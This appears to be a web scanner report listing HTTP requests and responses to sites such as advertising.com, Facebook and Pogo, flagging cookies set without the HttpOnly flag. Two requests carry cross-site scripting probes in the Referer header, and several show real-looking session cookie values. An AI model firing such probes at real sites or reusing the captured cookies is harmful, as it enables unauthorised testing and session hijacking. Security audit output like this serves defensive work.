GET /site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; F1=BA5Dp0EBAAAABAAAAEAAgEA; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ROLL=v5Q2V0cRVUyqcZK!
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:48:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.955433.777340.0XMC Set-Cookie: C2=wPRKNJpwIg02FtBCdbdRbA7gHw8jGPgsjhADga0K; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: F1=BA/Ep0EBAAAABAAAAIAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: 17871065=_4d2913f0,4120808867,777340^955433^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:48:32 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1579
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=BA/Ep0EBAAAABAAAAIAAaEA; BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; C2=4PRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0K; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.949895.777340.0XMC Set-Cookie: C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: F1=BQBFp0EBAAAABAAAAMAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: 49979532=_4d291414,0737842127,777340^949895^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:08 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/exchange/ HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/marketplace/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/membership/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/membership/logout.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/partnerportal/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/showcase/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/store/html/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cfusion/support/index.cfm HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /events/main.jsp HTTP/1.1 Host: www.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:27:31 GMT Server: Jetty/4.2.x (SunOS/5.10 sparc java/1.4.2_02) Set-Cookie: AWID=10.116.66.9.1294550851826;path=/;domain=.adobe.com;expires=Tue, 05-Jan-2021 21:27:31 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=1c1o9aj6r4w3c;path=/ Cache-Control: max-age=900 Expires: Sun, 09 Jan 2011 05:42:31 GMT Connection: close Vary: Accept-Encoding, User-Agent
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html x ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/technology-12126880 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /js/iFrame/index.php?userId=998826224-3432-8939b981e2 HTTP/1.1 Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=A2E-W; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:14:42 GMT Content-Length: 29866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:15 GMT Content-Length: 11443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Pogo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=DGAoC; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:26 GMT Content-Length: 29798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/impression.php?campaign_id=137675572948107&partner_id=pandora.com&placement=like_button&extra_1=http%3A%2F%2Fwww.pandora.com%2F%3Fext_reg%3D1&extra_2=US HTTP/1.1 Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Ffacebook.com%2Fzync&layout=standard&show_faces=false&width=200&action=like&colorscheme=light&height=40 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%253Fext_reg%253D1%26extra_2%3DUS; expires=Tue, 08-Feb-2011 01:23:22 GMT; path=/; domain=.facebook.com; httponly X-Cnection: close Date: Sun, 09 Jan 2011 01:23:22 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/landing.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 08-Feb-2011 01:43:45 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:45 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /event.php?eid=139663112758241 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/login.php P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=1_yt8; path=/; domain=.facebook.com Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fevent.php%3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly Set-Cookie: next_path=%2Fevent.php%3Feid%3D139663112758241; path=/; domain=.facebook.com; httponly Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:20:48 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /logout.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=77KNI; path=/; domain=.facebook.com Set-Cookie: roadblock=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:18:12 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=USH4D; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:14:19 GMT Content-Length: 27574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /peanutlabs HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=WrbZx; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:43 GMT Content-Length: 130584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sitetour/connect.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/instantpersonalization/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=4KsQr; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:17:22 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:42 GMT Content-Length: 16799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /games/scrabble?pageSection=free_home_hot_games1_pl_scrabble HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/entry.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; 